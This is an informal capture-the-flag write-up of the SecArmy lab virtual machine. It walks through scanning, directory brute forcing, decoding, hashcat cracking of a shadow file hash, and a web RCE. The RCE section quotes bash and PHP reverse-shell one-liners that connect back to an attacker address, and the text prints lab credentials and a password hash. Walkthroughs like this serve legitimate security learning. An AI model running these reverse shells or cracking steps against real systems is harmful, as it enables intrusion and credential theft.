CTF-Writeups/SecarmyCTF/SecArmyOSCP.md
2020-10-30 12:41:28 -04:00

15 KiB

Sec Army CTF

Abdullah Rizwan | 29 October , 6:12 PM

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 18:11 PKT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 18:11 (0:00:12 remaining)
Nmap scan report for 192.168.1.5
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2c:54:d0:5a:ae:b3:4f:5b:f8:65:5d:13:c9:ee:86:75 (RSA)
|   256 0c:2b:3a:bd:80:86:f8:6c:2f:9e:ec:e4:7d:ad:83:bf (ECDSA)
|_  256 2b:4f:04:e0:e5:81:e4:4c:11:2f:92:2a:72:95:58:4e (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Totally Secure Website
MAC Address: 08:00:27:4D:91:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Challenge 1 (Uno)

By visting the web page which is hosted on PORT 80 we will given task 1 to solve

Now it says that there might be a hidden directory so lets brute force directory

gobuster dir -u http://192.168.1.5:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

Here we can see /anon so let's visit this directory

Now you won't see the text because it is hidden by making the text color white so it's important select all text or visit the source code of page

This may be credentials for the user for ssh lets try doing that

And we got in , got a foothold!

We easily solved the challenge

But there is a readme.txt file which says

Challenge 2 (Dos)

The readme.txt file which you have just read gives password for the user dos lets see if that user actually exists on this box

root:x:0:0:root:/root:/bin/bash                                           
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin                                      
sys:x:3:3:sys:/dev:/usr/sbin/nologin                                      
sync:x:4:65534:sync:/bin:/bin/sync                                        
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
uno:x:1001:1001:,,,:/home/uno:/bin/bash
dos:x:1002:1002:,,,:/home/dos:/bin/bash
tres:x:1003:1003:,,,:/home/tres:/bin/bash
cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
seis:x:1006:1006:,,,:/home/seis:/bin/bash
siete:x:1007:1007:,,,:/home/siete:/bin/bash
ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
cero:x:1000:1000:,,,:/home/cero:/bin/bash

And appearenlty he does ! So let's try to use switch user

We successfully switched to don

dos@svos:~$ ls -la
total 180
drwx------  7 dos  dos    4096 Oct 19 19:46 .
drwxr-xr-x 12 root root   4096 Oct 19 11:05 ..
-rw-rw-r--  1 dos  dos      47 Oct  5 09:24 1337.txt
-rw-r--r--  1 dos  dos     220 Sep 22 11:36 .bash_logout
-rw-r--r--  1 dos  dos    3771 Sep 22 11:36 .bashrc
drwx------  2 dos  dos    4096 Sep 22 12:49 .cache
drwx------  2 dos  dos    4096 Sep 22 13:59 .elinks
drwxr-xr-x  2 dos  dos  135168 Sep 27 14:51 files
drwx------  3 dos  dos    4096 Sep 22 12:49 .gnupg
drwxrwxr-x  3 dos  dos    4096 Sep 22 13:24 .local
-rw-r--r--  1 dos  dos     807 Sep 22 11:36 .profile
-rw-rw-r--  1 dos  dos     104 Sep 23 09:52 readme.txt
dos@svos:~$ cat readme.txt 
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
dos@svos:~$ 

Now this says to find a8211ac1853a1235d48829414626512a this string which actually a md5 hash in folder files but problem is that that folder has 5001 text files

To be honest I did'nt know the command for looking for a text in files so I just used google

That returned me the result that I wanted

Now it's telling you to look at file3131.txt which gives us

UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA

If you have done some CTF's the works thing that should come to your mind is that this is a base64 encoded text :D

Head over to cyberchef

You might see something like this challenge2/flag2.txt

Hover your curosr next to Output on that something like a magic stick icon and you'll get your second flag

We can see a text from todo.txt

Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

Challegne 3 (Tres)

As on the user dos's directory we can see a hint that

dos@svos:~$ cat 1337.txt 
Our netcat application is too 1337 to handle..

This refers to port 1337 on the box so

I tried looking for a parameter ?p=1 , ?secret=2, ?token=3 , ?waste=3 but since this isn't a php file hosted these won't work

Then I focused on the hint and it was mentioned netcat application is too 1337 to handle . I quickly visited goolge for answers

https://unix.stackexchange.com/questions/332163/netcat-send-text-to-echo-service-read-reply-then-exit

I did find something

echo that token and pipe it to netcat by specifing IP and port

Challenge 4 (Cuatro)

Now we are in as tres so let's start exploring his home directory

Now we are presented with a binary exploitation challenge(Buffer Overflow) , we can see a binary file secarmy-village . But running it gives us an error

I couldn't figure it out what was I supposed to fix in this binary , I had an idea to do something with ghidra but I failed to do it .

Challenge 5 (Cinco)

when you visit /var/www/html this is where your webpage are being hosted , on visiting we can find directories and webpages there

anon directory was the one which we came to know through gobuster so we know that these will be shown or port80 , let's try justanothergallery

It has an index.php page and a sub directory of qr which contains a lot of qr code images that we scan

We can this qr code from any qr android application which can be downloaded through playstore or from wherever you prefer

By scanning this qr code we will get the text presented

image-0 Hello
image-1 and
image-2 congrats
image-3 for
image-4 solving
image-5 this
image-6 challenge,
image-7 we
image-8 hope
image-9 that
image-10 you
image-11 enojoyed
image-12 the
image-13 challenges
image-14 we
image-15 presented
image-16 so
image-17 far.
image-18 It
image-19 is
image-20 time
image-21 for
image-22 us
image-23 to
image-24 increase
image-25 the
image-26 difficulty
image-27 level
image-28 and
image-29 make
image-30 the
image-31 upcoming
image-32 challenges
image-33 more
image-34 challenging
image-35 than
image-36 previous
image-37 ones.
image-38 Before
image-39 you
image-40 move
image-41 to
image-42 the
image-43 next
image-44 challenge,
image-45 here
image-46 are
image-47 the
image-48 credentials
image-49 for
image-50 the
image-51 5th
image-52 user
image-53 cinco:ruy70m35
image-54 head
image-55 over
image-56 to
image-57 this
image-58 user
image-59 and
image-60 get
image-61 your
image-62 5th
image-63 flag!
image-64 goodluck

Ahhhh , so I scanned the 64 qr images through my phone and got credentials for cinco:ruy70m35

Now the readme.txt says

cinco@svos:~$ cat readme.txt 
Check for Cinco's secret place somewhere outside the house
cinco@svos:~$ 

By "looking outside the house" it means to look outside the ~ (home) directory

Here we find cincos-secrets

This is all we get at cincos-secrets

We know that shadow.bak which is backup of the original shadow file belongs to cincos so we can change permissions for the file since it belongs to us

It doesn't matter which permissions you give but in a real sceanrio you should give permissions to that specific user like this

chmod u+rwx shadow.bak or depending upon the type of file it is Or

chmod 700 shadow.bak

On reading file we will see a hash

seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::

We already know from the hint that we need to user rockyou.txt

Copy this whole hash and put it in a file , not necessary to give a txt extension. Now you can either use john the ripper or hashcat , for me john the ripper was taking too long so I used hashcat (although it doesn't work sometimes on windows but it dit work :D)

hashcat -a 0 -m 1800 -o cracked.txt hash /usr/share/wordlists/rockyou.tx

Challenge 6 (Seis)

I didn't solve this one in order xD

Challenge 7 (Siete)

Visiting /var/www/html we will see shellcmsdashboard so lets hop over to that directory

Coming back to the box , we can a robots.txt by reading it we can a password there

On giving the right credentials , it's going to point us to go on the next page

Now this here is a RCE vulnerability , we can give any command we want and it will execute this for us

Now we have seen that there was readme9213.txt we can easily read it because we are www-data in this case and that file belongs it .

But doing cat readme9213.txt won't give us the result so we need a reverse shell in order to read that file.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

bash -i >& /dev/tcp/192.168.1.7/4444 0>&1 - This did'nt worked php -r '$sock=fsockopen("192.168.1.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");' This did

We cannot read the file because it's permissions are to just write and execute but since it belongs to us we can pretty much change it to readable.

/var/www/html/shellcmsdashboard
$ cat readme9213.txt
cat: readme9213.txt: Permission denied
$ ls -la
total 24
drwxrwxrwx 2 root     root 4096 Oct 18 15:02 .
drwxr-xr-x 5 root     root 4096 Oct  8 17:51 ..
-rwxrwxrwx 1 root     root 1459 Oct  1 17:57 aabbzzee.php
-rwxrwxrwx 1 root     root 1546 Oct 18 15:02 index.php
--wx-wx-wx 1 www-data root   48 Oct  8 17:54 readme9213.txt
-rwxrwxrwx 1 root     root   58 Oct  1 17:37 robots.txt
$ chmod u=rwx readme9213.txt
$ cat readme9213.txt
password for the seventh user is 6u1l3rm0p3n473
$ 

Hint is given which tells that the message is a decimal text

On decoding the message from deciaml we get

I wasn't able to solve this challenge so couldn't proceed any further.

End

So I didn't see how the remaining challenges looked like , although it was easy but I didn't had that much exposure to CTF competitions.